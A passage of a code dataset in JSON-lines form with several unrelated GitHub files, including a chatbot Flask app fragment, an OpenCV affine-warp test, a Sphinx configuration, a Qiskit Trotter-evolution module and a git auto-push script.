entity_user[\"favorites\"]\n except TypeError as e:\n favorites = []\n if favorites == []:\n send_message(event, \"よかったら好きなキャストさんを教えてください。\")\n else:\n reply = \"\\n\".join([f + \"さん\" for f in favorites]) + \"\\n推しなんですね!\"\n send_message(event, reply)\n\nif __name__ == \"__main__\":\n app.run(debug=True,host='0.0.0.0',port=int(os.environ.get('PORT', 8080)))\n","repo_name":"kitta65/project_shiki_cast_bot","sub_path":"cloud_run/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"106845892","text":"import csv\n\n# write the results from i_dt to a csv file\ndef writeResult(subject_id, results):\n file_name = f'{subject_id}_results.csv'\n with open(file_name, mode=\"w\", newline='') as subject_data:\n csv_writer = csv.writer(subject_data, delimiter=',')\n csv_writer.writerow(['known','centroid_x', 'centroid_y', 'fix_dur'])\n for result in results:\n row_i = 0\n for row in result[1]:\n csv_writer.writerow([result[0], row[0], row[1], result[2][row_i]])\n row_i += 1\n csv_writer.writerow([])","repo_name":"aatuv/eye2020group4","sub_path":"write_results.py","file_name":"write_results.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32280736146","text":"class Node():\n\tdef __init__(self,data,nxt,prev):\n\t\tself.data = data\n\t\tself.nxt = None\n\t\tself.prev = None\n\n\t@staticmethod\n\tdef insert_lst(data,head):\n\t\tnode = Node(data)\n\t\ttemp = head\n\t\twhile(temp.nxt!=None):\n\t\t\ttemp=temp.nxt\n\t\ttemp.nxt = node\n\t\tnode.prev = temp\n\t\ttemp.nxt = 
node\n\n\n\n\n","repo_name":"isharajan/python_stuff","sub_path":"dblyll.py","file_name":"dblyll.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4511820419","text":"#!/bin/python3\n\nimport sys\n\ndef lonely_integer(a):\n    tmp_a= dict()\n    for i in a:\n        tmp_a[i] = tmp_a.get(i, 0) + 1\n    for key, value in tmp_a.items():\n        if value==1:\n            return key\n\n\n\nn = int(input().strip())\na = [int(a_temp) for a_temp in input().strip().split(' ')]\nprint(lonely_integer(a))\n","repo_name":"pensebien/intro_to_programming","sub_path":"hackerrank/lonelyint.py","file_name":"lonelyint.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"7839654321","text":"import cv2\r\nfrom skimage.external.tifffile import TiffFile\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nimage_cv2=cv2.imread(\"C:\\\\Users\\\\kylenate\\\\Desktop\\\\paper_registration1114\\\\santa_cruz_az-band7.tif\",cv2.IMREAD_UNCHANGED)\r\n\r\n\r\n\r\npts1 = np.float32([[0,0],[1000,0],[1000,1000]])\r\npts2 = np.float32([[0,np.random.randint(0,200,(1,))[0]],[np.random.randint(800,1000,(1,))[0],0],[1000,np.random.randint(800,1000,(1,))[0]]])\r\nM1 = cv2.getAffineTransform(pts1,pts2)\r\nwrap1 = cv2.warpAffine(image_cv2,M1,(1000,1000))\r\n\r\n\r\nplt.subplot(2,2,1)\r\nplt.imshow(wrap1)\r\n\r\n\r\nM2=cv2.getAffineTransform(pts2,pts1)\r\nwrap2 = cv2.warpAffine(wrap1,M2,(1000,1000))\r\n\r\nplt.subplot(2,2,2)\r\nplt.imshow(wrap2)\r\n\r\n\r\npts3 = np.float32([[0,0],[1000,0],[1000,1000]])\r\npts4 = np.float32([[0,np.random.randint(0,200,(1,))[0]],[np.random.randint(800,1000,(1,))[0],0],[1000,np.random.randint(800,1000,(1,))[0]]])\r\nM3 = cv2.getAffineTransform(pts3,pts4)\r\nwrap3 = cv2.warpAffine(wrap2,M3,(1000,1000))\r\n\r\nplt.subplot(2,2,3)\r\nplt.imshow(wrap3)\r\n\r\n\r\npts5 = pts2\r\npts6 = pts4\r\nM4 = cv2.getAffineTransform(pts6,pts5)\r\nwrap4 = cv2.warpAffine(wrap3,M4,(1000,1000))\r\n\r\n\r\nplt.subplot(2,2,4)\r\nplt.imshow(wrap4)\r\nplt.show()\r\n","repo_name":"liliangzhi110/E2EIR","sub_path":"generate_affine_pre_data/wrapAffine/test_4point_random_random_landsat_256.py","file_name":"test_4point_random_random_landsat_256.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"68"} +{"seq_id":"70801051098","text":"# Configuration file for the Sphinx documentation builder.\n#\n# For the full list of built-in configuration values, see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Project information -----------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information\n\nproject = \"Posey 
Control\"\ncopyright = \"2023, Anthony Wertz\"\nauthor = \"Anthony Wertz\"\nrelease = \"1.2.0\"\n\n# -- General configuration ---------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration\n\nextensions = [\n \"sphinx.ext.autodoc\",\n \"sphinx.ext.napoleon\",\n \"sphinx.ext.mathjax\",\n \"sphinx.ext.autosummary\",\n \"sphinx.ext.viewcode\",\n \"sphinx_immaterial\",\n \"sphinx_immaterial.apidoc.python.apigen\",\n \"sphinx.ext.githubpages\",\n # \"sphinx_design\",\n # \"IPython.sphinxext.ipython_console_highlighting\",\n # \"IPython.sphinxext.ipython_directive\",\n # \"ipython_with_reprs\",\n]\n\ntemplates_path = [\"_templates\"]\nexclude_patterns = []\n\n\n# -- Options for HTML output -------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n#\nhtml_theme = \"sphinx_immaterial\"\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"_static\"]\n\n# html_css_files = [\n# \"extra.css\",\n# ]\n\n# # Define a custom inline Python syntax highlighting literal\n# rst_prolog = \"\"\"\n# .. role:: python(code)\n# :language: python\n# :class: highlight\n# \"\"\"\n\n# Sets the default role of `content` to :python:`content`, which uses the custom Python syntax highlighting inline literal\n# default_role = \"python\"\n\nhtml_title = \"Posey Control\"\nhtml_show_sphinx = False\n\n# Sphinx Immaterial theme options\nhtml_theme_options = {\n \"icon\": {\n \"repo\": \"fontawesome/brands/github\",\n },\n \"site_url\": \"https://github.com/SML-Posey/posey-ctrl\",\n \"repo_url\": \"https://github.com/SML-Posey/posey-ctrl\",\n \"repo_name\": \"SML-Posey/posey-ctrl\",\n \"repo_type\": \"github\",\n \"social\": [\n {\n \"icon\": \"fontawesome/brands/github\",\n \"link\": \"https://github.com/SML-Posey/posey-ctrl\",\n },\n {\n \"icon\": \"fontawesome/brands/python\",\n \"link\": \"https://pypi.org/SML-Posey/posey-ctrl\",\n },\n ],\n \"edit_uri\": \"\",\n \"globaltoc_collapse\": True,\n \"features\": [\n \"navigation.expand\",\n # \"navigation.tabs\",\n # \"toc.integrate\",\n \"navigation.sections\",\n # \"navigation.instant\",\n # \"header.autohide\",\n \"navigation.top\",\n # \"navigation.tracking\",\n # \"search.highlight\",\n \"search.share\",\n \"toc.follow\",\n \"toc.sticky\",\n \"content.tabs.link\",\n \"announce.dismiss\",\n ],\n \"palette\": [\n {\n \"media\": \"(prefers-color-scheme: light)\",\n \"scheme\": \"default\",\n \"primary\": \"light-green\",\n \"accent\": \"light-blue\",\n \"toggle\": {\n \"icon\": \"material/lightbulb-outline\",\n \"name\": \"Switch to dark mode\",\n },\n },\n {\n \"media\": \"(prefers-color-scheme: dark)\",\n \"scheme\": \"slate\",\n \"primary\": \"deep-orange\",\n \"accent\": \"lime\",\n \"toggle\": {\n \"icon\": \"material/lightbulb\",\n \"name\": \"Switch to light mode\",\n },\n },\n ],\n}\n\nhtml_last_updated_fmt = \"\"\nhtml_use_index = True\nhtml_domain_indices = True\n\n# -- Extension configuration -------------------------------------------------\n\n# Create hyperlinks to other documentation\nautodoc_default_options = {\n # 
\"imported-members\": True,\n \"members\": True,\n \"undoc-members\": True,\n # \"special-members\": True,\n # \"inherited-members\": \"ndarray\",\n # \"member-order\": \"groupwise\",\n}\nautodoc_typehints = \"signature\"\nautodoc_typehints_description_target = \"documented\"\nautodoc_typehints_format = \"short\"\n\n# -- Sphinx Immaterial configs -------------------------------------------------\n\n# Python apigen configuration\npython_apigen_modules = {\n \"poseyctrl\": \"poseyctrl\",\n}\npython_apigen_default_groups = [\n (\"class:.*\", \"Classes\"),\n (\"data:.*\", \"Variables\"),\n (\"function:.*\", \"Functions\"),\n (\"classmethod:.*\", \"Class methods\"),\n (\"method:.*\", \"Methods\"),\n (r\"method:.*\\.[A-Z][A-Za-z,_]*\", \"Constructors\"),\n (r\"method:.*\\.__[A-Za-z,_]*__\", \"Special methods\"),\n (r\"method:.*\\.__(init|new)__\", \"Constructors\"),\n (r\"method:.*\\.__(str|repr)__\", \"String representation\"),\n (\"property:.*\", \"Properties\"),\n (r\".*:.*\\.is_[a-z,_]*\", \"Attributes\"),\n]\npython_apigen_default_order = [\n (\"class:.*\", 10),\n (\"data:.*\", 11),\n (\"function:.*\", 12),\n (\"classmethod:.*\", 40),\n (\"method:.*\", 50),\n (r\"method:.*\\.[A-Z][A-Za-z,_]*\", 20),\n (r\"method:.*\\.__[A-Za-z,_]*__\", 28),\n (r\"method:.*\\.__(init|new)__\", 20),\n (r\"method:.*\\.__(str|repr)__\", 30),\n (\"property:.*\", 60),\n (r\".*:.*\\.is_[a-z,_]*\", 70),\n]\npython_apigen_order_tiebreaker = \"alphabetical\"\npython_apigen_case_insensitive_filesystem = False\npython_apigen_show_base_classes = True\n\n# Python domain directive configuration\npython_module_names_to_strip_from_xrefs = [\"collections.abc\"]\n\n# General API configuration\nobject_description_options = [\n (\"py:.*\", dict(include_rubrics_in_toc=True)),\n]\n\nsphinx_immaterial_custom_admonitions = [\n {\n \"name\": \"seealso\",\n \"title\": \"See also\",\n \"classes\": [\"collapsible\"],\n \"icon\": \"fontawesome/regular/eye\",\n \"override\": True,\n },\n {\n \"name\": \"star\",\n \"icon\": \"octicons/star-fill-24\",\n \"color\": (255, 233, 3), # Gold\n },\n {\n \"name\": \"fast-performance\",\n \"title\": \"Faster performance\",\n \"icon\": \"material/speedometer\",\n \"color\": (40, 167, 69), # Green: --sd-color-success\n },\n {\n \"name\": \"slow-performance\",\n \"title\": \"Slower performance\",\n \"icon\": \"material/speedometer-slow\",\n \"color\": (220, 53, 69), # Red: --sd-color-danger\n },\n]\n","repo_name":"SML-Posey/posey-ctrl","sub_path":"_docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":6524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32393460598","text":"from typing import Union, Tuple, Optional\nimport numpy as np\nfrom scipy.linalg import expm\nfrom qiskit import QuantumCircuit\nimport aqc_research.checking as chk\nimport aqc_research.utils as helper\nfrom aqc_research.circuit_transform import qcircuit_to_state, qcircuit_to_matrix\nimport aqc_research.mps_operations as mpsop\nfrom aqc_research.parametric_circuit import (\n ParametricCircuit,\n TrotterAnsatz,\n first_layer_included,\n)\n\n\nclass Trotter:\n \"\"\"\n Class for Trotter evolution of quantum states. 
Namely, given an input\n initial state and evolution parameters provided in constructor, the\n member functions of this class evolve the initial state forward in time\n using a Trotter circuit.\n\n By definition, a single \"Trotter step\" is a full layer of elementary\n 2-qubit Trotter blocks applied to every pair of adjacent qubits.\n In case of 2nd order Trotter, additional half-layer is implied at the end.\n \"\"\"\n\n def __init__(\n self,\n *,\n num_qubits: int,\n evol_time: float,\n num_steps: int,\n delta: float = 1.0,\n second_order: bool,\n ):\n \"\"\"\n Args:\n num_qubits: number of qubits.\n evol_time: evolution time.\n num_steps: number of Trotter steps (full layers).\n delta: parameter of corresponding Hamiltonian - scale of z-terms.\n second_order: True, if the 2nd order Trotter is intended.\n \"\"\"\n assert chk.is_int(num_qubits, num_qubits >= 2)\n assert chk.is_float(evol_time, evol_time > 0)\n assert chk.is_int(num_steps, num_steps >= 1)\n assert chk.is_float(delta, delta > 0)\n assert isinstance(second_order, bool)\n\n self._num_qubits = num_qubits\n self._evol_time = evol_time\n self._num_trotter_steps = num_steps\n self._delta = delta\n self._dt = evol_time / float(num_steps)\n self._second_order = second_order\n\n @property\n def evol_time(self) -> float:\n \"\"\"Returns the evolution time.\"\"\"\n return self._evol_time\n\n @property\n def time_step(self) -> float:\n \"\"\"Returns the time step in Trotter evolution.\"\"\"\n return self._dt\n\n @property\n def num_trotter_steps(self) -> int:\n \"\"\"Returns the number of steps (full layers) in Trotter algorithm.\"\"\"\n return self._num_trotter_steps\n\n def as_vector(self, ini_state: Union[np.ndarray, QuantumCircuit]) -> np.ndarray:\n \"\"\"\n Time evolution of an initial state by Trotter approximation.\n\n Args:\n ini_state: a full state vector or a quantum circuit that generates\n initial state from ``|0>``.\n\n Returns:\n the state: ``|state> = Trotter |ini_state>``.\n \"\"\"\n if isinstance(ini_state, np.ndarray):\n assert chk.complex_1d(ini_state)\n qc_ini = QuantumCircuit(helper.num_qubits_from_size(ini_state.size))\n else:\n assert isinstance(ini_state, QuantumCircuit)\n qc_ini = ini_state\n\n qc = trotter_circuit(\n qc=qc_ini,\n dt=self._dt,\n delta=self._delta,\n num_trotter_steps=self._num_trotter_steps,\n second_order=self._second_order,\n )\n\n if isinstance(ini_state, np.ndarray):\n state = qcircuit_to_matrix(qc) @ ini_state\n else:\n state = qcircuit_to_state(qc)\n return state\n\n def as_qcircuit(self, ini_state: QuantumCircuit) -> QuantumCircuit:\n \"\"\"\n Time evolution of an initial state by Trotter approximation. Well, it is\n not a time evolution per se, rather a circuit generation procedure. 
The\n latter circuit, being applied to zero state ``|0>``, can produce the\n desired result.\n\n **Note**, the ``ini_state`` circuit will be augmented by the Trotter one.\n Do *not* consider it as an immutable one.\n\n Args:\n ini_state: quantum circuit that generates initial state from ``|0>``.\n\n Returns:\n the initial quantum circuit augmented by the Trotter one.\n \"\"\"\n return trotter_circuit(\n ini_state,\n dt=self._dt,\n delta=self._delta,\n num_trotter_steps=self._num_trotter_steps,\n second_order=self._second_order,\n )\n\n def as_mps(\n self,\n ini_state: QuantumCircuit,\n trunc_thr: float = mpsop.no_truncation_threshold(),\n out_state: Optional[np.ndarray] = None,\n ) -> mpsop.QiskitMPS:\n \"\"\"\n Time evolution of initial state by Trotter approximation in MPS format.\n\n Args:\n ini_state: quantum circuit that generates initial state from ``|0>``.\n trunc_thr: truncation threshold in MPS representation.\n out_state: output array for storing state as a normal vector;\n *note*, this can be very slow and even intractable\n for a large number of qubits; useful for testing only.\n\n Returns:\n MPS data generated by Qiskit backend, possibly with state vector,\n if ``out_state`` is provided.\n \"\"\"\n qc = trotter_circuit(\n ini_state,\n dt=self._dt,\n delta=self._delta,\n num_trotter_steps=self._num_trotter_steps,\n second_order=self._second_order,\n )\n return mpsop.mps_from_circuit(qc, trunc_thr=trunc_thr, out_state=out_state)\n\n\ndef make_hamiltonian(num_qubits: int, delta: float) -> np.ndarray:\n \"\"\"\n Makes a Hamiltonian matrix. This function is used only for testing to ensure\n generated Trotterized ansatz is consistent with Hamiltonian.\n\n **Note**, here we use *half-spin* matrices.\n\n **Remark**: it turns out the bit-ordering does not matter unless\n Hamiltonian is asymmetric, which is *not* this case.\n\n Args:\n num_qubits: number of qubits.\n delta: parameter of the Hamiltonian - scaling factor of z-terms.\n\n Returns:\n Hamiltonian matrix.\n \"\"\"\n\n def _full_matrix(_s_: np.ndarray, _j_: int) -> np.ndarray:\n \"\"\"Expands a 2x2 Pauli matrix into a full one.\"\"\"\n return np.kron(np.kron(np.eye(2**_j_), _s_), np.eye(2 ** (num_qubits - _j_ - 1)))\n\n def _b2b(_i_: int) -> int:\n \"\"\"\n Bit-to-bit conversion. 
See the remark in the parent function doc-string.\n \"\"\"\n # return num_qubits - 1 - _i # flip bit-ordering to conform to Qiskit\n return _i_ # do nothing\n\n sigmax = np.array([[0, 1], [1, 0]])\n sigmay = np.array([[0, 0 - 1.0j], [1.0j, 0]], dtype=np.cfloat)\n sigmaz = np.array([[1, 0], [0, -1]])\n\n sx_ = [_full_matrix(sigmax, j) for j in range(num_qubits)]\n sy_ = [_full_matrix(sigmay, j) for j in range(num_qubits)]\n sz_ = [_full_matrix(sigmaz, j) for j in range(num_qubits)]\n\n rng = range(num_qubits - 1)\n sx_sx = [np.dot(sx_[_b2b(i)], sx_[_b2b(i + 1)]) for i in rng]\n sy_sy = [np.dot(sy_[_b2b(i)], sy_[_b2b(i + 1)]) for i in rng]\n sz_sz = [np.dot(sz_[_b2b(i)], sz_[_b2b(i + 1)]) for i in rng]\n\n xterms = np.sum(sx_sx, axis=0)\n yterms = np.sum(sy_sy, axis=0)\n zterms = np.sum(sz_sz, axis=0)\n\n h = -0.25 * (xterms + yterms + delta * zterms)\n return h\n\n\ndef exact_evolution(\n hamiltonian: np.ndarray,\n ini_state: Union[QuantumCircuit, np.ndarray],\n evol_time: float,\n) -> np.ndarray:\n \"\"\"\n Computes exact state evolution starting from the initial state.\n This function is used only for testing to ensure generated Trotterized\n ansatz is consistent with Hamiltonian.\n\n **Note**, might be a slow routine, suitable for debugging and testing\n with a moderate number of qubits.\n\n Args:\n hamiltonian: Hamiltonian for state evolution.\n ini_state: quantum circuit acting on the state ``|0>``\n to produce an initial one, or a corresponding quantum state.\n evol_time: evolution time.\n\n Returns:\n final state as the result of time evolution of the initial one.\n \"\"\"\n assert chk.complex_2d(hamiltonian)\n assert isinstance(ini_state, (QuantumCircuit, np.ndarray))\n assert chk.is_float(evol_time, evol_time > 0)\n\n if isinstance(ini_state, QuantumCircuit):\n ini_state = qcircuit_to_state(ini_state)\n assert chk.complex_1d(ini_state)\n assert hamiltonian.shape == (ini_state.size, ini_state.size)\n\n e_h = expm((-1.0j * evol_time) * hamiltonian)\n exact_state = np.matmul(e_h, ini_state)\n return exact_state\n\n\ndef trotter_alphas(dt: float, delta: float) -> np.ndarray:\n \"\"\"\n Computes 3 angular parameters (``alphas``) of a Trotter building block.\n\n Args:\n dt: time step in Trotter algorithm.\n delta: parameter of corresponding Hamiltonian.\n\n Returns:\n angular parameters of Trotter building block.\n \"\"\"\n assert chk.is_float(dt, dt > 0)\n assert chk.is_float(delta, delta > 0)\n\n return np.asarray([np.pi / 2 - 0.5 * delta * dt, 0.5 * dt - np.pi / 2, np.pi / 2 - 0.5 * dt])\n\n\ndef trotter_global_phase(num_qubits: int, num_steps: int, second_order: bool) -> float:\n \"\"\"\n Returns global phase of a Trotter circuit. 
Note, after Trotter, the global\n phase of a qcircuit instance should be incremented as follows:\n ``qcircuit.global_phase += exp(1j * (global phase))``.\n\n Args:\n num_qubits: number of qubits.\n num_steps: number of Trotter steps.\n second_order: True, if the 2nd order Trotter is intended.\n\n Returns:\n global phase of Trotter circuit.\n \"\"\"\n assert chk.is_int(num_qubits, num_qubits >= 2)\n assert chk.is_int(num_steps, num_steps >= 1)\n assert isinstance(second_order, bool)\n\n quarter_pi = 0.25 * np.pi\n phs = quarter_pi * (num_qubits - 1) * num_steps\n if second_order:\n if num_qubits % 2 == 0: # even\n # return ph + quarter_pi * (num_qubits // 2)\n return phs + quarter_pi * num_qubits\n else: # odd\n # return ph + quarter_pi * ((num_qubits - 1) // 2)\n return phs + quarter_pi * (num_qubits - 1)\n else:\n return phs\n\n\ndef trotter_circuit(\n qc: QuantumCircuit,\n *,\n dt: float,\n delta: float,\n num_trotter_steps: int,\n second_order: bool,\n) -> QuantumCircuit:\n \"\"\"\n Generates a 1st or 2nd order Trotter circuit and adds it to the input one.\n By definition, a single \"Trotter step\" is a full layer of elementary.\n 2-qubit Trotter blocks applied to every pair of adjacent qubits.\n The parameter ``num_trotter_steps`` defines the number of layers in the\n circuit. The parameter ``dt`` characterizes the evolution time per step\n (layer). The total evolution time is equal to ``dt * num_trotter_steps``.\n\n **Note**, 2nd order Trotter circuit comprises additional half-layer at the end.\n\n **Note**, currently we ignore the global phase, see the remark at the\n beginning of this script.\n\n Args:\n qc: quantum circuit to be augmented by the Trotter one.\n dt: evolution time per step (layer) in Trotter algorithm.\n delta: parameter of corresponding Hamiltonian.\n num_trotter_steps: number of Trotter steps (layers).\n second_order: True, if the 2nd order Trotter is intended.\n\n Returns:\n quantum circuit augmented by the Trotter one.\n \"\"\"\n assert isinstance(qc, QuantumCircuit) and qc.num_qubits > 0\n assert chk.is_int(num_trotter_steps, num_trotter_steps > 0)\n\n def _trotter_block(k: int, params: np.ndarray):\n qc.rz(-np.pi / 2, k + 1)\n qc.cnot(k + 1, k)\n qc.rz(params[0], k)\n qc.ry(params[1], k + 1)\n qc.cnot(k, k + 1)\n qc.ry(params[2], k + 1)\n qc.cnot(k + 1, k)\n qc.rz(np.pi / 2, k)\n\n # Compute Trotter parameters. In case of 2nd order, the first and the trail\n # half-layers should be initialized differently (\"betas\").\n alphas = trotter_alphas(dt, delta)\n betas = trotter_alphas(dt * 0.5, delta) # dt/2 (!) 
in first/last half-layers\n\n # Build the main part of the 1st or 2nd order Trotter circuit.\n for j in range(num_trotter_steps):\n for q in range(0, qc.num_qubits - 1, 2): # 1st half of a layer\n _trotter_block(q, betas if second_order and j == 0 else alphas)\n for q in range(1, qc.num_qubits - 1, 2): # 2nd half of a layer\n _trotter_block(q, alphas)\n\n # For 2nd order Trotter, we add an extra half-layer identical to the front one.\n if second_order:\n for q in range(0, qc.num_qubits - 1, 2):\n _trotter_block(q, betas)\n\n return qc\n\n\ndef identity_circuit(num_qubits: int) -> QuantumCircuit:\n \"\"\"\n Returns the identity (empty) quantum circuit.\n \"\"\"\n assert chk.is_int(num_qubits, num_qubits >= 2)\n return QuantumCircuit(num_qubits)\n\n\ndef neel_init_state(num_qubits: int) -> QuantumCircuit:\n \"\"\"\n Returns quantum circuit that produces the state ``|101010...>``\n (Neel state) of alternating units from the state ``|0>``.\n \"\"\"\n assert chk.is_int(num_qubits, num_qubits >= 2)\n qc = QuantumCircuit(num_qubits)\n for k in range(0, num_qubits, 2):\n qc.x(k)\n return qc\n\n\ndef half_zero_circuit(num_qubits: int) -> QuantumCircuit:\n \"\"\"\n Returns quantum circuit that produces the state ``|00...0011...11>``\n of half-zero/half-unit bits from the state ``|0>``.\n \"\"\"\n assert chk.is_int(num_qubits, num_qubits >= 2)\n qc = QuantumCircuit(num_qubits)\n for k in range(num_qubits // 2, num_qubits):\n qc.x(k)\n return qc\n\n\ndef fidelity(\n state1: Union[mpsop.QiskitMPS, np.ndarray],\n state2: Union[mpsop.QiskitMPS, np.ndarray],\n) -> float:\n \"\"\"Computes fidelity between two states, which must have the same type.\"\"\"\n if isinstance(state1, np.ndarray) and isinstance(state2, np.ndarray):\n assert chk.complex_1d(state1) and chk.complex_1d(state2)\n return float(np.abs(np.vdot(state1, state2)) ** 2)\n else:\n return float(np.abs(mpsop.mps_dot(state1, state2)) ** 2)\n\n\ndef state_difference(state1: np.ndarray, state2: np.ndarray) -> float:\n \"\"\"Computes norm of state difference. **Note**, phase factor can crucial.\"\"\"\n assert chk.complex_1d(state1) and chk.complex_1d(state2)\n return float(np.linalg.norm(state1 - state2))\n\n\ndef slice2q(\n circ: ParametricCircuit,\n vec: np.ndarray,\n *,\n layer_range: Optional[Tuple[int, int]] = None,\n) -> Tuple[np.ndarray, Tuple[int, int]]:\n \"\"\"\n Returns a slice of input vector's entries pertaining to the range of\n layers specified. Actually, a view of the vector is returned.\n\n **Note**, here ``layer`` is a collection of (num_qubit - 1) triplets of\n unit-blocks. 
Triplet structure of ansatz resembles (but not coincides with)\n the Trotter circuit and has 12 parameters.\n\n Args:\n circ: parametrized ansatz circuit.\n vec: vector of parameters or gradients to be sliced.\n layer_range: range of layers to get a slice of vector entries for;\n entire range is implied for the None value.\n\n Returns:\n (1) 3D array of reshaped entries of the input vector, the 1st index\n enumerates selected layers in the range, the 2nd index enumerates 2-qubit\n triplets of blocks (Trotter units), the 3rd index enumerates 1-qubit gates\n in a triplet (and corresponding entries in ``vec``).\n (2) range of layers; validated to the full range in case of None\n input value.\n \"\"\"\n if not isinstance(circ, TrotterAnsatz):\n raise ValueError(\"expects Trotterized ansatz\")\n assert isinstance(vec, np.ndarray) and vec.shape == (circ.num_thetas,)\n\n num_layers = circ.num_layers\n layer_range = (0, num_layers) if layer_range is None else layer_range\n\n assert chk.is_tuple(layer_range, len(layer_range) == 2)\n assert num_layers * circ.bpl == circ.num_blocks\n assert 0 <= layer_range[0] < layer_range[1] <= num_layers\n\n # Get a sub-set of layers, each layer consists of n-1 triplets of CX-blocks\n # with 12 (3 * 4) angular parameters in every triplet.\n vec2q = circ.subset2q(vec).reshape((num_layers, circ.num_qubits - 1, 12))\n vec2q = vec2q[layer_range[0] : layer_range[1]]\n assert np.shares_memory(vec2q.ravel(), vec) # \"vec2q\" is a view of \"vec\"\n return vec2q, layer_range\n\n\ndef init_ansatz_to_trotter(\n circ: ParametricCircuit,\n thetas: np.ndarray,\n *,\n evol_time: float,\n delta: float,\n layer_range: Optional[Tuple[int, int]] = None,\n) -> np.ndarray:\n \"\"\"\n Modifies the angular parameter ``thetas``, within specified range of layers,\n in such way that ansatz becomes equivalent the Trotter circuit. This function\n is used to generate the best possible initial vector of angular parameters\n for optimization.\n\n Args:\n circ: parametric circuit associated with this objective.\n thetas: angular parameters of the circuit.\n evol_time: evolution time; unit-block layers within ``layer_range``\n should model state evolution for that time.\n delta: parameter in corresponding Hamiltonian.\n layer_range: a couple of indices ``[from, to)`` that defines a range of\n unit-block layers to be initialized; None value implies\n a full range.\n\n Returns:\n vector of angular parameters ``thetas`` initialized to reproduce\n Trotter circuit.\n \"\"\"\n th2q, layer_range = slice2q(circ, thetas, layer_range=layer_range)\n delta_t = evol_time / float(layer_range[1] - layer_range[0])\n alphas = trotter_alphas(dt=delta_t, delta=delta)\n assert chk.float_1d(alphas, alphas.size == 3)\n assert isinstance(circ, TrotterAnsatz)\n layer_0 = first_layer_included(circ, layer_range)\n\n # If the first layer of unit-blocks is included, we set the front layer\n # of 1-qubit gates to zero. 
Do NOT be confused: \"front layer\" of 1-qubit\n    # gates and the \"first layer\" of 2-qubit unit-blocks are different notions.\n    if layer_0:\n        circ.subset1q(thetas).fill(0)\n\n    # Most of the angular parameters are equal to zero, except 3 per block triplet.\n    th2q.fill(0)\n    th2q[:, :, 5] = alphas[0]\n    th2q[:, :, 0] = alphas[1]\n    th2q[:, :, 6] = alphas[2]\n\n    # In case of the 2nd order Trotter and if the first layer is included in the\n    # requested range, we initialize differently the front and trail half-layers.\n    # Recall, the trailing half-layer takes exactly the same parameters as the\n    # first one, although it is not present explicitly in TrotterAnsatz.\n    if circ.is_second_order and layer_0:\n        alphas = trotter_alphas(dt=delta_t * 0.5, delta=delta)  # dt/2 (!)\n        half = circ.half_layer_num_blocks // 3  # half of triplets in layer_0\n        assert 3 * half == circ.half_layer_num_blocks  # divisible\n        th2q[0, 0:half, 5] = alphas[0]\n        th2q[0, 0:half, 0] = alphas[1]\n        th2q[0, 0:half, 6] = alphas[2]\n\n    return thetas\n","repo_name":"qiskit-community/aqc-research","sub_path":"aqc_research/model_sp_lhs/trotter/trotter.py","file_name":"trotter.py","file_ext":"py","file_size_in_byte":18900,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"32208722214","text":"import os\nimport subprocess\nfrom datetime import datetime\n\n# Path of the log file\nlog_file_path = 'git_push_log.txt'\n\n# Read the directory list file\nwith open('directory_list.txt', 'r') as file:\n    directories = [line.strip() for line in file]\n\n# GitHub repository URL\nrepo_url = 'https://github.com/username/repo.git'\n\n# Commit message\ncommit_message = f'Auto commit at {datetime.now()}'\n\n\n# Open the log file in append mode ('a')\nwith open(log_file_path, 'a') as log_file:\n    for directory_path in directories:\n        try:\n            # Change into the target directory\n            os.chdir(directory_path)\n\n            # Run the Git commands\n            subprocess.run(['git', 'pull'])\n            subprocess.run(['git', 'add', '.'])\n            subprocess.run(['git', 'commit', '-m', commit_message])\n            # subprocess.run(['git', 'push', repo_url, 'master'])\n            subprocess.run(['git', 'push'])\n\n            # Write a success entry to the log file\n            log_file.write(f'Successfully pushed changes for {directory_path}\\n')\n\n        except Exception as e:\n            # Write the exception to the log file\n            log_file.write(f'Error pushing changes for {directory_path}: {str(e)}\\n')\n\n# Signal that the script has finished\nprint('Script execution completed.')\n    \n","repo_name":"IceTeaOxO/gitTask","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32280736146","text":"class Segment:\n\n    def __init__(self, start, end):\n        self.start = start\n        self.end = end\n\n    def split(self, other):\n        A = []\n        b = []\n\n        # get line equations\n        A.append([self.start[1] - self.end[1], self.end[0] - self.start[0]])\n        A.append([other.start[1] - other.end[1], other.end[0] - other.start[0]])\n        b.append(self.end[0]*self.start[1] - self.start[0]*self.end[1])\n        b.append(other.end[0]*other.start[1] - other.start[0]*other.end[1])\n\n        # calc determinant\n        det = A[0][0]*A[1][1] - A[0][1]*A[1][0]\n        if abs(det) < 0.0001:\n            return None\n\n        det_x = b[0]*A[1][1] - b[1]*A[0][1]\n        det_y = A[0][0]*b[1] - A[1][0]*b[0]\n        p = det_x/det, det_y/det\n        return Segment(self.start, p), Segment(p, self.end)\n\n    def 